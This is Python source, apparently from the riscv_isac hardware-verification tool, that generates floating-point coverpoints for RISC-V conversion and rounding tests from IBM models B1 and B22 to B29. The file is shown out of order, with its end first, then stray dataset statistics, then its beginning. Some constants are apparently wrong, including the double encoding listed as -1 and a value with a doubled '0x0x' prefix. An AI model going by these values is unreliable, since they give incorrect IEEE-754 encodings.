exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent in the range [-3, integer width+3]'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(52)
bits = bin(bits)[2:]
front_zero = 52-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(0,1020)
exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent less than -3'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
bits = random.getrandbits(52)
bits = bin(bits)[2:]
front_zero = 52-len(bits)
sig = '0'*front_zero + bits
exp = random.randint(xlen+1026,2047)
exp = '{:011b}'.format(exp)
sgn = random.getrandbits(1)
sgn = '{:01b}'.format(sgn)
ir_bin = ('0b'+sgn+exp+sig)
op = fields_dec_converter(flen,'0x'+hex(int('1'+ir_bin[2:],2))[3:])
op_dataset.append([op, ' | Exponent: ' + str(int(exp,2)-1023) + ', Exponent greater than (integer width+3)'])
b22_comb.append((floatingPoint_tohex(flen,float(op)),))
coverpoints = []
k=0
for c in b22_comb:
cvpt = ""
for x in range(1, 2):
# cvpt += 'rs'+str(x)+'_val=='+str(c[x-1]) # uncomment this if you want rs1_val instead of individual fields
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += op_dataset[k][1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+ \
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B22 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b23(flen, opcode, ops):
'''
IBM Model B23 Definition:
This model creates boundary cases for the rounding to integers that might cause Overflow.
A test case will be created with inputs equal to the maximum integer number in the destination's format (MaxInt), or close to it. In particular, the following FP numbers will be used:
1. ±MaxInt
2. ±MaxInt ± 0.01 (¼)
3. ±MaxInt ± 0.1 (½)
4. ±MaxInt ± 0.11 (¾)
5. ±MaxInt ± 1
Rounding Mode: All
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operand 1 = [ MaxInt-4, MaxInt+5 ]
Implementation:
- In the range of (-4,5), the dataset array is appended with the hexadecimal equivalent of maxnum plus the iteration number in a string format. The next highest encoding of the hexadecimal value is calculated.
- This is done with different values of maxnum for flen=32 or flen=64.
- Since this model is meant for floating point conversion instructions, only one operand is expected.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
getcontext().prec = 40
operations = ['+','-']
nums = [0,100,200,800,1600]
dataset = []
if flen == 32:
maxnum = 0x4f000000 # MaxInt (2**31-1) in IEEE 754 Floating Point Representation
for i in range(-4,5):
dataset.append((hex(int(maxnum)+i),"| MaxInt + ({})".format(str(i))))
elif flen == 64:
maxnum = 0x43e0000000000000
for i in range(-4,5):
dataset.append((hex(int(maxnum)+i),"| MaxInt + ({})".format(str(i))))
coverpoints = []
k=0
for c in dataset:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.s":
cvpt += '0'
else:
cvpt += str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " "+c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B23 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return (coverpoints)
def ibm_b24(flen, opcode, ops):
'''
IBM Model B24 Definition:
This model creates boundary cases for rounding to integer that might cause major loss of accuracy.
A test-case will be created for each of the following inputs:
1. ±0
2. ±0 ± 0.01 (¼)
3. ±0 ± 0.1 (½)
4. ±0 ± 0.11 (¾)
5. ±1
6. ±1 + 0.01 (¼)
7. ±1 + 0.1 (½)
8. ±1 + 0.11 (¾)
Rounding Mode: All
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operand 1 = [±0, ±0 ± 0.01, ±0 ± 0.1, ±0 ± 0.11, ±1, ±1 + 0.01, ±1 + 0.1, ±1 + 0.11]
Implementation:
- A nested loop with 4 stages is initiated to iterate each element in minimums, nums, operations1 and operations2 for the two operands. This is done to form the dataset defined above.
- Depending on the value of flen, these values are then converted into their respective IEEE 754 hexadecimal values.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
getcontext().prec = 40
operations = ['+','-']
nums = [0,0.01,0.1,0.11]
minnums = [0,1]
dataset = []
for minnum in minnums:
for num in nums:
for op1 in operations:
for op2 in operations:
dataset.append((eval(op1+str(minnum)+op2+str(num)),op1+str(minnum)+op2+str(num)))
b24_comb = []
for data in dataset:
t = "{:e}".format(data[0])
b24_comb.append((floatingPoint_tohex(flen,float(t)),data[1]))
b24_comb = set(b24_comb)
coverpoints = []
k=0
for c in b24_comb:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.s":
cvpt += '0'
else:
cvpt += str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " | "+c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B24 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return (coverpoints)
def ibm_b25(flen, opcode, ops, seed=10):
'''
IBM Model B25 Definition:
This model creates a test-case for each of the following inputs:
1. ±MaxInt
2. ±0
3. ±1
4. Random number
:param xlen: Size of the integer registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [±MaxInt, ±0, ±1, Random number]
Implementation:
- The dataset is formed as per the dataset description.
- rand_num is initialized to a random number in the range (1, maxnum).
- Since this model is for an integer to floating point conversion instruction, the operands are presented in decimal format.
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
random.seed(seed)
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
getcontext().prec = 40
operations = ['+','-']
nums = [0,0.01,0.1,0.11]
dataset = [(0,"0"),(1,"1"),(-1,"-1")]
if flen == 32:
maxnum = 2**31-1
elif flen == 64:
maxnum = 2**63-1
dataset.append((maxnum,"MaxInt"))
dataset.append((-1*maxnum,"-MaxInt"))
rand_num = int(random.uniform(1,maxnum))
dataset.append((rand_num,"+ve Random Number"))
dataset.append((-1*rand_num,"-ve Random Number"))
b25_comb = []
for data in dataset:
b25_comb.append((int(data[0]),data[1]))
coverpoints = []
k=0
for c in b25_comb:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += "rs1_val == "+str(c[x-1])
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.wu":
cvpt += str(0)
else:
cvpt += str(rm)
cvpt += ' # Number = '
cvpt += c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B25 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return (coverpoints)
def ibm_b26(xlen, opcode, ops, seed=10):
'''
IBM Model B26 Definition:
This model creates a test-case for each possible value of the number of significant bits in the input operand (which is an integer). A test is created with an example from each of the following
ranges: [0], [1], [2,3], [4,7], [8,15], …, [(MaxInt+1)/2, MaxInt]
:param xlen: Size of the integer registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = Random number in [0], [1], [2,3], [4,7], [8,15], …, [(MaxInt+1)/2, MaxInt]
Implementation:
- A random number is chosen in the ranges defined above.
- Since this model is for an integer to floating point conversion instruction, the operands are presented in decimal format.
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
random.seed(seed)
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
dataset = [(0," # Number in [0]"),(1," # Number in [1]")]
i = 3
while(i<=2**(xlen-1)-1):
rand_num = random.randint(int((i+1)/2),i)
dataset.append((rand_num," # Random number chosen in the range: ["+str(int((i+1)/2))+", "+str(i)+"]"))
i = i*2+1
coverpoints = []
k=0
for c in dataset:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += "rs1_val == "+str(c[x-1])
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or opcode in "fcvt.d.wu":
cvpt += str(0)
else:
cvpt += str(rm)
cvpt += c[1]
coverpoints.append(cvpt)
k=k+1
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if xlen == 32 else str(64)) + '-bit coverpoints using Model B26 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b27(flen, opcode, ops, seed=10):
'''
IBM Model B27 Definition:
This model tests the conversion of NaNs from a wider format to a narrow one. Each combination from the following table will create one test case (N represents the number of bits in the significand of the destination's format):
[SNaN, QNaN]
==================== ========================================================= =====================
Value of the operand The N-1 MSB bits of the significand (excluding the first) The rest of the bits
==================== ========================================================= =====================
QNaN All 0 All 0
SNan Not all 0 Not all 0
==================== ========================================================= =====================
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [ SNaN, QNaN ]
Implementation:
- Dataset is the combination of snan and qnan values predefined at random initially.
- Depending on the value of flen, these values are then converted into their respective IEEE 754 hexadecimal values.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
if flen == 32:
dataset = fsnan + fqnan
elif flen == 64:
dataset = dsnan + dqnan
coverpoints = []
for c in dataset:
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c,str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c) + '(' + str(c) + ')'
if(y != ops):
cvpt += " and "
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B27 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b28(flen, opcode, ops, seed=10):
'''
IBM Model B28 Definition:
This model tests the conversion of a floating point number to an integral value, represented in floating-point format. A test case will be created for each of the following inputs:
1. +0
2. A random number in the range (+0, +1)
3. +1
4. Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25)
5. A random number in the range (+1, +1.11..11*2^precision)
6. +1.11..11*2^precision
7. +Infinity
8. NaN
9. -0
10. A random number in the range (-1, -0)
11. -1
12. Every value in the range [-10.11, -1.00)
13. A random number in the range (-1.11..11*2^precision , -1)
14.-1.11..11*2^precision
15. –Infinity
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10. Actual value is set with respect to the opcode calling the function)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [ ±0, ±1, ±Infinity, Default NaN, A random number in the range (+0, +1), Every value in the range (1.00, 10.11] (1 to 2.75 in jumps of 0.25), A random number in the range (+1, +1.11..11*2^precision), ±1.11..11*2^precision, A random number in the range (-1, -0), Every value in the range [-10.11, -1.00), A random number in the range (-1.11..11*2^precision , -1) ]
Implementation:
- According to the given inputs, all cases are declared and appended to the dataset for flen=32 and flen=64.
- Random numbers are obtained in the respective ranges and for absolute values, it is inherited from the dataset definition.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with rounding mode “0” for that particular opcode.
'''
random.seed(seed)
opcode = opcode.split('.')[0] + '.' + opcode.split('.')[1]
dataset = []
if flen == 32:
dataset.append((fzero[0],"+0"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
dataset.append((fone[0],"+1"))
for i in range(125,300,25):
dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(1,2**31-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
dataset.append((floatingPoint_tohex(32,float(2**31-1)),"MaxInt"))
dataset.append((finfinity[0],"+Infinity"))
dataset.append((fsnan[0],"Signaling NaN"))
dataset.append((fqnan[0],"Quiet NaN"))
dataset.append((fzero[1],"-0"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
dataset.append((fone[1],"-1"))
for i in range(-275,-100,25):
dataset.append((floatingPoint_tohex(32, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
dataset.append((floatingPoint_tohex(32,float(random.uniform(-2**31-1,-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
dataset.append((floatingPoint_tohex(32,float(-2**31-1)),"-MaxInt"))
dataset.append((finfinity[1],"-Infinity"))
elif flen == 64:
dataset.append((dzero[0],"+0"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(0,1))),"A random number in the range (+0, +1)"))
dataset.append((done[0],"+1"))
for i in range(125,300,25):
dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ (1,2.75]"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(1,2**63-1))),"A random number in the range (+1, +1.11..11*2^precision)"))
dataset.append((floatingPoint_tohex(64,float(2**63-1)),"MaxInt"))
dataset.append((dinfinity[0],"+Infinity"))
dataset.append((dsnan[0],"Signaling NaN"))
dataset.append((dqnan[0],"Quiet NaN"))
dataset.append((dzero[1],"-0"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(-1,0))),"A random number in the range (-1, -0)"))
dataset.append((done[1],"-1"))
for i in range(-275,-100,25):
dataset.append((floatingPoint_tohex(64, i/100),"Number = "+str(i/100)+" => Number ∈ [-2.75,-1)"))
dataset.append((floatingPoint_tohex(64,float(random.uniform(-2**63-1,-1))),"A random number in the range (-1.11..11*2^precision, -1)"))
dataset.append((floatingPoint_tohex(64,float(-2**63-1)),"-MaxInt"))
dataset.append((dinfinity[1],"-Infinity"))
coverpoints = []
for c in dataset:
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == 0'
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " | "+c[1]
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B28 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
def ibm_b29(flen, opcode, ops, seed=10):
'''
IBM Model B29 Definition:
This model checks different cases of rounding of the floating point number. A test will be created for each possible combination of the Sign, LSB, Guard bit and the Sticky bit (16 cases for each operation).
Rounding Mode: All
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:param seed: Initial seed value of the random library. (Predefined to 10)
:type flen: int
:type opcode: str
:type ops: int
:param seed: int
Abstract Dataset Description:
Operand 1 = [All possible combinations of Sign, LSB, Guard and Sticky are taken]
Implementation:
- A random mantissa is obtained and is iterated for each sign in each digit in the binary number.
- The exponent is always maintained at -3, in order to facilitate the shift process that occurs during the actual conversion.
- The respective hexadecimal values are appended to the dataset along with the respective Least, Guard and Sticky bit value wherever available.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with all rounding modes for that particular opcode.
'''
random.seed(seed)
sgns = ["0","1"]
dataset = []
if flen == 32:
mant = random.getrandbits(20)
mant = '{:020b}'.format(mant)
for sgn in sgns:
for i in range(8):
LeastGuardSticky = '{:03b}'.format(i)
hexnum = "0x" + hex(int("1"+sgn + "01111100" + mant + LeastGuardSticky,2))[3:]
dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
.format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
elif flen == 64:
mant = random.getrandbits(49)
mant = '{:049b}'.format(mant)
for sgn in sgns:
for i in range(8):
LeastGuardSticky = '{:03b}'.format(i)
hexnum = "0x" + hex(int("1"+sgn + "01111111100" + mant + LeastGuardSticky,2))[3:]
dataset.append((hexnum,"Exp = -3; Sign = {}; LSB = {}; Guard = {}; Sticky = {}"\
.format(sgn,LeastGuardSticky[0],LeastGuardSticky[1],LeastGuardSticky[2])))
coverpoints = []
for c in dataset:
for rm in range(0,5):
cvpt = ""
for x in range(1, ops+1):
cvpt += (extract_fields(flen,c[x-1],str(x)))
cvpt += " and "
cvpt += 'rm_val == '
if "fmv" in opcode or "fcvt.d.s" in opcode:
cvpt += '0'
else:
cvpt += str(rm)
cvpt += ' # '
for y in range(1, ops+1):
cvpt += 'rs'+str(y)+'_val=='
cvpt += num_explain(flen, c[y-1]) + '(' + str(c[y-1]) + ')'
if(y != ops):
cvpt += " and "
cvpt += " | "+c[1]
coverpoints.append(cvpt)
mess='Generated'+ (' '*(5-len(str(len(coverpoints)))))+ str(len(coverpoints)) +' '+\
(str(32) if flen == 32 else str(64)) + '-bit coverpoints using Model B29 for '+opcode+' !'
logger.info(mess)
coverpoints = comments_parser(coverpoints)
return coverpoints
| 40.462749 | 463 | 0.635045 | from riscv_isac.log import logger
import itertools
import struct
import random
import sys
import math
from decimal import *
fzero = ['0x00000000', '0x80000000']
fminsubnorm = ['0x00000001', '0x80000001']
fsubnorm = ['0x00000002', '0x80000002', '0x007FFFFE', '0x807FFFFE', '0x00555555', '0x80555555']
fmaxsubnorm = ['0x007FFFFF', '0x807FFFFF']
fminnorm = ['0x00800000', '0x80800000']
fnorm = ['0x00800001', '0x80800001', '0x00855555', '0x80855555', '0x008AAAAA', '0x808AAAAA', '0x55000000', '0xD5000000', '0x2A000000', '0xAA000000']
fmaxnorm = ['0x7F7FFFFF', '0xFF7FFFFF']
finfinity = ['0x7F800000', '0xFF800000']
fdefaultnan = ['0x7FC00000', '0xFFC00000']
fqnan = ['0x7FC00001', '0xFFC00001', '0x7FC55555', '0xFFC55555']
fsnan = ['0x7F800001', '0xFF800001', '0x7FAAAAAA', '0xFFAAAAAA']
fone = ['0x3F800000', '0xBF800000']
dzero = ['0x0000000000000000', '0x8000000000000000']
dminsubnorm = ['0x0000000000000001', '0x8000000000000001']
dsubnorm = ['0x0000000000000002', '0x8000000000000002','0x0008000000000000', '0x0008000000000002', '0x0001000000000000', '0x8001000000000000','0x8001000000000003','0x8001000000000007']
dmaxsubnorm = ['0x000FFFFFFFFFFFFF', '0x800FFFFFFFFFFFFF']
dminnorm = ['0x0010000000000000', '0x8010000000000000']
dnorm = ['0x0010000000000002', '0x8010000000000002', '0x0011000000000000', '0x8011000000000000', '0x0018000000000000', '0x8018000000000000','0x8018000000000005','0x8018000000000007']
dmaxnorm = ['0x7FEFFFFFFFFFFFFF', '0xFFEFFFFFFFFFFFFF']
dinfinity = ['0x7FF0000000000000', '0xFFF0000000000000']
ddefaultnan = ['0x7FF8000000000000', '0xFFF8000000000000']
dqnan = ['0x7FF8000000000001', '0xFFF8000000000001', '0x7FFC000000000001', '0xFFFC000000000001']
dsnan = ['0x7FF0000000000001', '0xFFF0000000000001', '0x7FF4AAAAAAAAAAAA', '0xFFF4AAAAAAAAAAAA']
done = ['0x3FF0000000000000', '0xBF80000000000000']
rounding_modes = ['0','1','2','3','4']
def num_explain(flen,num):
num_dict = {
tuple(fzero) : 'fzero',
tuple(fminsubnorm) : 'fminsubnorm',
tuple(fsubnorm) : 'fsubnorm',
tuple(fmaxsubnorm) : 'fmaxsubnorm',
tuple(fminnorm) : 'fminnorm',
tuple(fnorm) : 'fnorm',
tuple(fmaxnorm) : 'fmaxnorm',
tuple(finfinity) : 'finfinity',
tuple(fdefaultnan) : 'fdefaultnan',
tuple(fqnan) : 'fqnan',
tuple(fsnan) : 'fsnan',
tuple(fone) : 'fone',
tuple(dzero) : 'dzero',
tuple(dminsubnorm) : 'dminsubnorm',
tuple(dsubnorm) : 'dsubnorm',
tuple(dmaxsubnorm) : 'dmaxsubnorm',
tuple(dminnorm) : 'dminnorm',
tuple(dnorm) : 'dnorm',
tuple(dmaxnorm) : 'dmaxnorm',
tuple(dinfinity) : 'dinfinity',
tuple(ddefaultnan) : 'ddefaultnan',
tuple(dqnan) : 'dqnan',
tuple(dsnan) : 'dsnan',
tuple(done) : 'done'
}
num_list = list(num_dict.items())
for i in range(len(num_list)):
if(('0x'+num[2:].upper()) in num_list[i][0]):
return(num_list[i][1])
if flen == 32:
e_sz = 8
m_sz = 23
else:
e_sz = 11
m_sz = 52
bin_val = bin(int('1'+num[2:],16))[3:]
sgn = bin_val[0]
exp = bin_val[1:e_sz+1]
man = bin_val[e_sz+1:]
if(int(exp,2)!=0):
return('fnorm' if flen==32 else 'dnorm')
else:
return('fsubnorm' if flen==32 else 'dsubnorm')
def extract_fields(flen, hexstr, postfix):
if flen == 32:
e_sz = 8
m_sz = 23
else:
e_sz = 11
m_sz = 52
bin_val = bin(int('1'+hexstr[2:],16))[3:]
sgn = bin_val[0]
exp = bin_val[1:e_sz+1]
man = bin_val[e_sz+1:]
if flen == 32:
string = 'fs'+postfix+' == '+str(sgn) +\
' and fe'+postfix+' == '+'0x'+str(hex(int('1'+exp,2))[3:]) +\
' and fm'+postfix+' == '+'0x'+str(hex(int('10'+man,2))[3:])
elif flen == 64:
string = 'fs'+postfix+' == '+str(sgn) +\
' and fe'+postfix+' == '+'0x'+str(hex(int('10'+exp,2))[3:]) +\
' and fm'+postfix+' == '+'0x'+str(hex(int('1'+man,2))[3:])
return string
def fields_dec_converter(flen, hexstr): # IEEE-754 Hex -> Decimal Converter
if flen == 32:
e_sz = 8
m_sz = 23
elif flen == 64:
e_sz = 11
m_sz = 52
bin_val = bin(int('1'+hexstr[2:],16))[3:]
sgn = bin_val[0]
exp = bin_val[1:e_sz+1]
man = bin_val[e_sz+1:]
num=''
if(int(sgn)==1):
sign = '-'
elif(int(sgn)==0):
sign = '+'
exp_str = '*pow(2,'
if(flen == 32):
if((int(exp,2)-127)<-126):
conv_num = 0.0
exp_str+= str(-126)+')'
elif((int(exp,2)-127)>=-126):
conv_num = 1.0
exp_str+= str(int(exp,2)-127)+')'
elif(flen == 64):
if((int(exp,2)-1023)<-1022):
conv_num = 0.0
exp_str+= str(-1022)+')'
elif((int(exp,2)-1023)>=-1022):
conv_num = 1.0
exp_str+= str(int(exp,2)-1023)+')'
for i in range(len(man)):
conv_num+= (1/(pow(2,i+1)))*int(man[i])
num = sign + str(conv_num) + exp_str
if(flen == 32):
if(eval(num) > 1e-45 or eval(num)<-1e-45):
return(eval(num))
else:
return(eval(sign+'1e-45'))
elif(flen == 64):
return(eval(num))
def floatingPoint_tohex(flen,float_no): # Decimal -> IEEE-754 Hex Converter
if(flen==32):
if(str(float_no)=='-inf'):
return(finfinity[1])
elif(str(float_no)=='inf'):
return(finfinity[0])
elif(flen==64):
if(str(float_no)=='-inf'):
return(dinfinity[1])
elif(str(float_no)=='inf'):
return(dinfinity[0])
float_no=float.hex(float_no)
num="N"
a=float.fromhex(float_no)
sign=0
if(a<0 or str(a)[0]=='-'):
sign=1
nor=float.hex(a) # Normalized Number
if(flen==32):
if(int(nor.split("p")[1])<-126): # Checking Underflow of Exponent
exp_bin=('0'*8) # Exponent of Subnormal numbers
exp_sn=int(nor.split("p")[1])
num="SN"
elif(int(nor.split("p")[1])>127): # Checking Overflow of Exponent
if(sign==0):
return "0x7f7fffff" # Most Positive Value
else:
return "0xff7fffff" # Most Negative Value
else: # Converting Exponent to 8-Bit Binary
exp=int(nor.split("p")[1])+127
exp_bin=('0'*(8-(len(bin(exp))-2)))+bin(exp)[2:]
elif(flen==64):
check_sn = nor.split("p")[0].split(".")[0]
if(int(check_sn[len(check_sn)-1])==0): # Checking Underflow of Exponent
exp_bin=('0'*11) # Exponent of Subnormal numbers
exp_sn=int(nor.split("p")[1])
num="SN"
elif(int(nor.split("p")[1])>1023): # Checking Overflow of Exponent
if(sign==0):
return "0x7FEFFFFFFFFFFFFF" # Most Positive Value
else:
return "0x0xFFEFFFFFFFFFFFFF" # Most Negative Value
else: # Converting Exponent to 8-Bit Binary
exp=int(nor.split("p")[1])+1023
exp_bin=('0'*(11-(len(bin(exp))-2)))+bin(exp)[2:]
if(num=="SN"):
if(sign==0):
mant="0x"+float_no.split("p")[0][4:]
else:
mant="0x"+float_no.split("p")[0][5:]
else:
if(sign==0):
mant="0x"+nor.split("p")[0][4:]
else:
mant="0x"+nor.split("p")[0][5:]
if(flen==32):
mant_bin=bin(int('1'+mant[2:],16))[3:]
if(num == "SN"):
mant_bin='1'+bin(int('1'+mant[2:],16))[3:]
while(exp_sn!=-127):
exp_sn+=1
mant_bin = '0'+mant_bin
binary="0b"
binary=binary+str(sign)+exp_bin+mant_bin[0:23]
hex_tp=hex(int(binary,2))
hex_tp=hex_tp.replace('0x','0x'+'0'*(8-(len(hex_tp)-2)))
elif(flen==64):
mant_bin=bin(int('1'+mant[2:],16))[3:]
if(num == "SN"):
mant_bin=bin(int('1'+mant[2:],16))[3:]
binary="0b"
binary=binary+str(sign)+exp_bin+mant_bin[0:52]
hex_tp=hex(int(binary,2))
hex_tp=hex_tp.replace('0x','0x'+'0'*(16-(len(hex_tp)-2)))
return(hex_tp)
def unique_cpts(x):
d = {}
for i in range(len(x)): # Returning a List Of Unique Coverpoints
if(d.get(x[i],"None") == "None"):
d[x[i]] = 1
else:
d[x[i]]+=1
return(list(d.keys()))
def comments_parser(coverpoints):
cvpts = []
for coverpoint in coverpoints:
cvpt = coverpoint.split("#")[0]
comment = coverpoint.split("#")[1]
cvpts.append((cvpt+ " #nosat",comment))
return cvpts
def ibm_b1(flen, opcode, ops):
'''
IBM Model B1 Definition:
Test all combinations of floating-point basic types, positive and negative, for
each of the inputs. The basic types are Zero, One, MinSubNorm, SubNorm,
MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, and
SNaN.
:param flen: Size of the floating point registers
:param opcode: Opcode for which the coverpoints are to be generated
:param ops: No. of Operands taken by the opcode
:type flen: int
:type opcode: str
:type ops: int
Abstract Dataset Description:
Operands =>
[Zero, One, MinSubNorm, SubNorm, MaxSubNorm, MinNorm, Norm, MaxNorm, Infinity, DefaultNaN, QNaN, SNaN]
Implementation:
- Dependent on the value of flen, a predefined dataset of floating point values are added.
- Using the itertools package, an iterative multiplication is performed with two lists to create an exhaustive combination of all the operand values.
- The operand values are then passed into the extract_fields function to get individual fields in a floating point number (sign, exponent and mantissa).
- Coverpoints are then appended with the respective rounding mode for that particular opcode.
'''
if flen == 32:
basic_types = fzero + fminsubnorm + [fsubnorm[0], fsubnorm[3]] +\
fmaxsubnorm + fminnorm + [fnorm[0], fnorm[3]] + fmaxnorm + \
finfinity + fdefaultnan + [fqnan[0], fqnan[3]] + \
[fsnan[0], fsnan[3]] + fone
elif flen == 64:
basic_types = dzero + dminsubnorm + [dsubnorm[0], dsubnorm[1]] +\
